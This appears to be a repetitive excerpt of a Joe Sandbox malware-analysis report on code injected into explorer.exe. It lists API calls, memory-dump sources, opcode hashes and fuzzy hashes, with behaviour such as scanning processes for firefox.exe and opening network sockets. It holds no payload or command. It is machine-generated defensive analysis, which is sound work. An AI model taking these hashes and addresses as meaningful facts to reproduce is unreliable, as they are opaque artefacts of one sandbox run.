                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Process32$CloseCreateFirstHandleNextOpenProcessSnapshotToolhelp32lstrcmpi
                                                                                                                                                                                                                                  • String ID: firefox.exe
                                                                                                                                                                                                                                  • API String ID: 3301242143-3034799888
                                                                                                                                                                                                                                  • Opcode ID: 62879796713b84d97d8f7283142b097a12a321dffc23b79af45d718103d110c7
                                                                                                                                                                                                                                  • Instruction ID: a5741a09769e63006f5f30cabb2923f33f09411b2db690aa44725491933f458f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 62879796713b84d97d8f7283142b097a12a321dffc23b79af45d718103d110c7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E501C472708A45C6EF209B26F94037A63A1F78CBB0F844234EA6946BE5DF2CC2489600
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _malloc_crt.LIBCMT ref: 0F3E4EC1
                                                                                                                                                                                                                                    • Part of subcall function 0F3DE9C4: malloc.LIBCMT ref: 0F3DE9EF
                                                                                                                                                                                                                                    • Part of subcall function 0F3DE9C4: Sleep.KERNEL32 ref: 0F3DEA02
                                                                                                                                                                                                                                  • free.LIBCMT ref: 0F3E4FC2
                                                                                                                                                                                                                                  • free.LIBCMT ref: 0F3E4FDE
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: free$Sleep_malloc_crtmalloc
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2523592665-0
                                                                                                                                                                                                                                  • Opcode ID: de62eea6751175f8c69b650b8628bb1470fc8a834dbeb80777570af6dbaca5fc
                                                                                                                                                                                                                                  • Instruction ID: f93a2c992e60c56a826fa870a9046322a4d76b7f0bd3d2ca058513507ef3916e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: de62eea6751175f8c69b650b8628bb1470fc8a834dbeb80777570af6dbaca5fc
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BB519D26301B5192DB24DF26E98076A73A4FB88BA8F484235AF5C47F51DF38D566C740
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 0C37B9D3
                                                                                                                                                                                                                                  • _errno.LIBCMT ref: 0C37B9C8
                                                                                                                                                                                                                                    • Part of subcall function 0C36CE70: _getptd_noexit.LIBCMT ref: 0C36CE74
                                                                                                                                                                                                                                  • _errno.LIBCMT ref: 0C37BA76
                                                                                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 0C37BA81
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3176672303.000000000C350000.00000020.00000001.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_c350000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _errno_invalid_parameter_noinfo$_getptd_noexit
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1573762532-0
                                                                                                                                                                                                                                  • Opcode ID: 211058e9f55984555118f162df26db9c9fa79f165e5373f0072c07de477b66e2
                                                                                                                                                                                                                                  • Instruction ID: 0078fed0374e27202e59b3cf733cc5181722170808f775dfa8c8ef43c2970573
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 211058e9f55984555118f162df26db9c9fa79f165e5373f0072c07de477b66e2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C541E172B3129983DF74AB2291906BAF2B0F740B98BA84316EBD547A88D73CC151CF00
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 0F3EC5D3
                                                                                                                                                                                                                                  • _errno.LIBCMT ref: 0F3EC5C8
                                                                                                                                                                                                                                    • Part of subcall function 0F3DDA70: _getptd_noexit.LIBCMT ref: 0F3DDA74
                                                                                                                                                                                                                                  • _errno.LIBCMT ref: 0F3EC676
                                                                                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 0F3EC681
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _errno_invalid_parameter_noinfo$_getptd_noexit
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1573762532-0
                                                                                                                                                                                                                                  • Opcode ID: acb4ed1eb4acd1eeb2d5280860084a6d03a753759c2936a3483095acd42b3401
                                                                                                                                                                                                                                  • Instruction ID: 475e99778ce47933115b9c8c9a3171474c0a356f73c6e5072443c5368a083ed7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: acb4ed1eb4acd1eeb2d5280860084a6d03a753759c2936a3483095acd42b3401
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A941E3B2A003B586DB289B2195406BE77A0FF50BF4BC86126EB9557AC6D73CE151C700
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 0C375616
                                                                                                                                                                                                                                  • _errno.LIBCMT ref: 0C37560B
                                                                                                                                                                                                                                    • Part of subcall function 0C36CE70: _getptd_noexit.LIBCMT ref: 0C36CE74
                                                                                                                                                                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0C375695
                                                                                                                                                                                                                                  • _errno.LIBCMT ref: 0C3756A6
                                                                                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 0C3756B1
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3176672303.000000000C350000.00000020.00000001.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_c350000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 781512312-0
                                                                                                                                                                                                                                  • Opcode ID: 87efd3317a81c0ecb358072b35436e616fdfe8d2fe3bddf9e2026144e3ef5478
                                                                                                                                                                                                                                  • Instruction ID: 06669dc1d0f55b4a8c5c718504a3486c9d63a98117816997e60571aa32ef6e47
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 87efd3317a81c0ecb358072b35436e616fdfe8d2fe3bddf9e2026144e3ef5478
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CF31F576B312E582DF38AB1291502BD73A0E754BA5FA49326ABD507A88D72CC556CF00
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 0F3E6216
                                                                                                                                                                                                                                  • _errno.LIBCMT ref: 0F3E620B
                                                                                                                                                                                                                                    • Part of subcall function 0F3DDA70: _getptd_noexit.LIBCMT ref: 0F3DDA74
                                                                                                                                                                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0F3E6295
                                                                                                                                                                                                                                  • _errno.LIBCMT ref: 0F3E62A6
                                                                                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 0F3E62B1
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 781512312-0
                                                                                                                                                                                                                                  • Opcode ID: 64b280ef0a08ae1d51dc21ff9ef209cdf5d27a7528d9ce6e267d6ddba166b408
                                                                                                                                                                                                                                  • Instruction ID: 55b3562face6f97005c762157ba36021246a08e1b20dc412e21a561c5e3906ef
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 64b280ef0a08ae1d51dc21ff9ef209cdf5d27a7528d9ce6e267d6ddba166b408
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 62312B72A243B1C2DF249B1295522BD7360EB70BF5BC44126EBD50BAD6DB2CD551C700
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _strncoll
                                                                                                                                                                                                                                  • String ID: false$null$true
                                                                                                                                                                                                                                  • API String ID: 4138090636-2913297407
                                                                                                                                                                                                                                  • Opcode ID: 70884d20571101490070adea5f6472474a62362fd5ccfcd9b5eab5712c25ef6e
                                                                                                                                                                                                                                  • Instruction ID: 94b93afa39e6a4917a548c74edd9afea454f3554b724b13935cf7447ced78d40
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 70884d20571101490070adea5f6472474a62362fd5ccfcd9b5eab5712c25ef6e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5E31017260478181FB20BF36D40432977A49B41FE4F89802ECB098BB97DB3DC980E7A1
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Current$AllocCloseCreateHandleHeapNextProcessSnapshotThreadThread32Toolhelp32
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4141954168-0
                                                                                                                                                                                                                                  • Opcode ID: db995df24fb14382045024f7a01a40ea28c77ebca70745760b02dfde695fedb4
                                                                                                                                                                                                                                  • Instruction ID: f48ce70f661a260d7c5c83f1e7a3de7f9bcfc99c4ed6d52781db6fcba8164591
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: db995df24fb14382045024f7a01a40ea28c77ebca70745760b02dfde695fedb4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D721A271604741C7EB60DF31E440369B3A1FB88BB8F488229DA5947B99EF7CEA44CB44
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __DestructExceptionObject.LIBCMT ref: 0C37038A
                                                                                                                                                                                                                                  • __DestructExceptionObject.LIBCMT ref: 0C370414
                                                                                                                                                                                                                                  • _getptd.LIBCMT ref: 0C370367
                                                                                                                                                                                                                                    • Part of subcall function 0C36F3DC: _getptd_noexit.LIBCMT ref: 0C36F3E2
                                                                                                                                                                                                                                    • Part of subcall function 0C36F3DC: _amsg_exit.LIBCMT ref: 0C36F3F2
                                                                                                                                                                                                                                  • _getptd.LIBCMT ref: 0C370419
                                                                                                                                                                                                                                  • _getptd.LIBCMT ref: 0C370425
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3176672303.000000000C350000.00000020.00000001.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_c350000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _getptd$DestructExceptionObject$_amsg_exit_getptd_noexit
                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                  • API String ID: 331613561-1018135373
                                                                                                                                                                                                                                  • Opcode ID: 16076cd70ee89e0090311c6e33922bef2e7ed2237c2f23457eed0913bfab5565
                                                                                                                                                                                                                                  • Instruction ID: d1026cf952e7e969631c13fc4787541f82578b04366b6bca9f8ca45cd5547296
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 16076cd70ee89e0090311c6e33922bef2e7ed2237c2f23457eed0913bfab5565
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3D212A762246848BD634DF56F04039EB761F788BA8F148226CF9947B58CB3CD88ACF01
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __DestructExceptionObject.LIBCMT ref: 08B9A576
                                                                                                                                                                                                                                  • __DestructExceptionObject.LIBCMT ref: 08B9A600
                                                                                                                                                                                                                                  • _getptd.LIBCMT ref: 08B9A553
                                                                                                                                                                                                                                    • Part of subcall function 08B93F34: _getptd_noexit.LIBCMT ref: 08B93F3A
                                                                                                                                                                                                                                    • Part of subcall function 08B93F34: _amsg_exit.LIBCMT ref: 08B93F4A
                                                                                                                                                                                                                                  • _getptd.LIBCMT ref: 08B9A605
                                                                                                                                                                                                                                  • _getptd.LIBCMT ref: 08B9A611
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3156274373.0000000008B90000.00000020.00000400.00020000.00000000.sdmp, Offset: 08B90000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_8b90000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _getptd$DestructExceptionObject$_amsg_exit_getptd_noexit
                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                  • API String ID: 331613561-1018135373
                                                                                                                                                                                                                                  • Opcode ID: 9a2fc0b797f98f79fe4a14a5232f7452d79c1f12860342049905014b00c6b91d
                                                                                                                                                                                                                                  • Instruction ID: f00893e1a49a883e213e77fb23d33dded8b1450c901d4b55338f178ffb91a235
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9a2fc0b797f98f79fe4a14a5232f7452d79c1f12860342049905014b00c6b91d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FA21193A20469487DB30DF16E04036EB761F389BA6F459266DFDA07B54CF39E486CB10
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • lstrlenA.KERNEL32 ref: 0F3C7478
                                                                                                                                                                                                                                  • lstrlenA.KERNEL32 ref: 0F3C7485
                                                                                                                                                                                                                                  • lstrlenA.KERNEL32 ref: 0F3C7490
                                                                                                                                                                                                                                  • lstrlenA.KERNEL32 ref: 0F3C749B
                                                                                                                                                                                                                                  • _malloc_dbg.MSVCRT ref: 0F3C74A9
                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 0F3C74CB
                                                                                                                                                                                                                                  • lstrcatA.KERNEL32 ref: 0F3C74D7
                                                                                                                                                                                                                                    • Part of subcall function 0F3C7500: lstrlenA.KERNEL32 ref: 0F3C7509
                                                                                                                                                                                                                                    • Part of subcall function 0F3C7500: ??3@YAXPEAX@Z.MSVCRT ref: 0F3C7520
                                                                                                                                                                                                                                    • Part of subcall function 0F3C7500: ??3@YAXPEAX@Z.MSVCRT ref: 0F3C7529
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrlen$??3@$_malloc_dbglstrcatwsprintf
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 698131048-0
                                                                                                                                                                                                                                  • Opcode ID: dcc5b1d27802517691ad9a9eb10b06728176b8132d7a436ae91f0d32cd5aa00d
                                                                                                                                                                                                                                  • Instruction ID: fcba47abfa166f5805f588f6b9d03431526aa625de6547c3e0d50b08d6a3a22b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dcc5b1d27802517691ad9a9eb10b06728176b8132d7a436ae91f0d32cd5aa00d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B1113925700B4286FA249F62ED5473DE7A4EB89FE0F484039DE8A57B25DE3CD5898740
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0F3C652C: GetWindowsDirectoryA.KERNEL32 ref: 0F3C6570
                                                                                                                                                                                                                                    • Part of subcall function 0F3C652C: GetVolumeInformationA.KERNEL32 ref: 0F3C65BF
                                                                                                                                                                                                                                    • Part of subcall function 0F3C652C: wsprintfA.USER32 ref: 0F3C661C
                                                                                                                                                                                                                                  • SHGetFolderPathA.SHELL32 ref: 0F3C6671
                                                                                                                                                                                                                                  • lstrcatA.KERNEL32 ref: 0F3C6681
                                                                                                                                                                                                                                  • lstrcatA.KERNEL32 ref: 0F3C668F
                                                                                                                                                                                                                                  • CreateDirectoryA.KERNEL32 ref: 0F3C669A
                                                                                                                                                                                                                                  • lstrcatA.KERNEL32 ref: 0F3C66AA
                                                                                                                                                                                                                                  • lstrcatA.KERNEL32 ref: 0F3C66B8
                                                                                                                                                                                                                                  • lstrcatA.KERNEL32 ref: 0F3C66C8
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrcat$Directory$CreateFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 943468954-0
                                                                                                                                                                                                                                  • Opcode ID: 75bf3eef1525e273a0ce453993aa70ff21a66b0465e8a14ac7d06560fd9804af
                                                                                                                                                                                                                                  • Instruction ID: 234d05bc723ec09b40ed439d67a7ce2a925154e8c988ade6b157c5ba8722174f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 75bf3eef1525e273a0ce453993aa70ff21a66b0465e8a14ac7d06560fd9804af
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FE018C61A24B0282FB24EF26F81072D63A1FB89BA5F043130DD0B42B248F3CC28CDB00
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3176672303.000000000C350000.00000020.00000001.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_c350000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _getptd
                                                                                                                                                                                                                                  • String ID: MOC$RCC$csm
                                                                                                                                                                                                                                  • API String ID: 3186804695-2671469338
                                                                                                                                                                                                                                  • Opcode ID: 98110a7f5896fdba0122f539c280d38c91be388ee6034f9a1e7113ee0ee41aa5
                                                                                                                                                                                                                                  • Instruction ID: aa02f4fa417788307d637414125d28aab7c93878cfbd4e721cf1ef83927a0211
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 98110a7f5896fdba0122f539c280d38c91be388ee6034f9a1e7113ee0ee41aa5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CBE0123A634104CACB3D6B94A0043EC3660FB9CB15FA6D671C68443704C7BC44988F23
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3156274373.0000000008B90000.00000020.00000400.00020000.00000000.sdmp, Offset: 08B90000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_8b90000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _getptd
                                                                                                                                                                                                                                  • String ID: MOC$RCC$csm
                                                                                                                                                                                                                                  • API String ID: 3186804695-2671469338
                                                                                                                                                                                                                                  • Opcode ID: f432e7f19e78333f864de7c56edb8646315a7c2ff8ccbb67fb06ecd88be4fbfc
                                                                                                                                                                                                                                  • Instruction ID: c8e85175bf6dce1304bd755cea540a25272b70191f1a7bb0d79f02d3fb909368
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f432e7f19e78333f864de7c56edb8646315a7c2ff8ccbb67fb06ecd88be4fbfc
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 26E01A3A521294CACF652B6880543AD77A4F79DB0BF8AF9F9C7D447310CBBD49818E12
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3156915026.0000000008CB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 08CB0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_8cb0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _getptd
                                                                                                                                                                                                                                  • String ID: MOC$RCC$csm
                                                                                                                                                                                                                                  • API String ID: 3186804695-2671469338
                                                                                                                                                                                                                                  • Opcode ID: f432e7f19e78333f864de7c56edb8646315a7c2ff8ccbb67fb06ecd88be4fbfc
                                                                                                                                                                                                                                  • Instruction ID: c4e909e9dedc89f1e3bdd9dc434db01ed449742c22e1633fb1c7ebad59dcee22
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f432e7f19e78333f864de7c56edb8646315a7c2ff8ccbb67fb06ecd88be4fbfc
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 78E0923A505E04C6C72D2B9584053ED3270FB98717FC6D569C70002311C7BC4A829A13
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _getptd
                                                                                                                                                                                                                                  • String ID: MOC$RCC$csm
                                                                                                                                                                                                                                  • API String ID: 3186804695-2671469338
                                                                                                                                                                                                                                  • Opcode ID: 98110a7f5896fdba0122f539c280d38c91be388ee6034f9a1e7113ee0ee41aa5
                                                                                                                                                                                                                                  • Instruction ID: bc7bd6d986442ed46e40b4a5397243279fdb3245e1dd6a51cb0fb0f75a06f2b9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 98110a7f5896fdba0122f539c280d38c91be388ee6034f9a1e7113ee0ee41aa5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DBE0E53B500294CAC7257B7494483AC36A5EFD8B36FCAD561865586782C7BC5888CB12
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Startupconnectgethostbynamehtonsmemcpysocket
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3789965056-0
                                                                                                                                                                                                                                  • Opcode ID: 7b865840928cfa8ee3d735138662da95c86a41f3413a23ebb31b10c64b31859f
                                                                                                                                                                                                                                  • Instruction ID: 966000ded8ee1a60510d53cf7c3db9e4c885a45925352fa8486a5fdb8f5e5c38
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7b865840928cfa8ee3d735138662da95c86a41f3413a23ebb31b10c64b31859f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5A11933260465581EB208F11E44475E73A1F748FA4F844231EE6903B69DF3CC64EC740
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Startupconnectgethostbynamehtonsmemcpysocket
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3789965056-0
                                                                                                                                                                                                                                  • Opcode ID: 1108d17e35cf59840690569f9378f038cd4dff50ad706ea5ac67de3fa5fbad05
                                                                                                                                                                                                                                  • Instruction ID: 6acd1986ef9dfff1709d03152ae894909e76370c0cbf6abde582fd257698daa6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1108d17e35cf59840690569f9378f038cd4dff50ad706ea5ac67de3fa5fbad05
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D4116072604A5292EB209F21E40476E7361FB48BA4F844631DE6A43BA4DF3CD68DD700
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrcatlstrlen$_malloc_dbglstrcpy
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3808055810-0
                                                                                                                                                                                                                                  • Opcode ID: 8a518e6e79db813022c490c8f9d72f8f6e62adf8804b6a8215776fb4ef10fb86
                                                                                                                                                                                                                                  • Instruction ID: dcdbd342e458eb3a99d34d8a852e7cdfb7b7e92aace17761ae228b35bbe27fa7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8a518e6e79db813022c490c8f9d72f8f6e62adf8804b6a8215776fb4ef10fb86
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8F018121B0074282EF289B67F95432DA761FF89FE4F0890389D0A07B29DE3CC1898700
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Pointerabort$DecodeEncode_set_abort_behavior
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2556904055-0
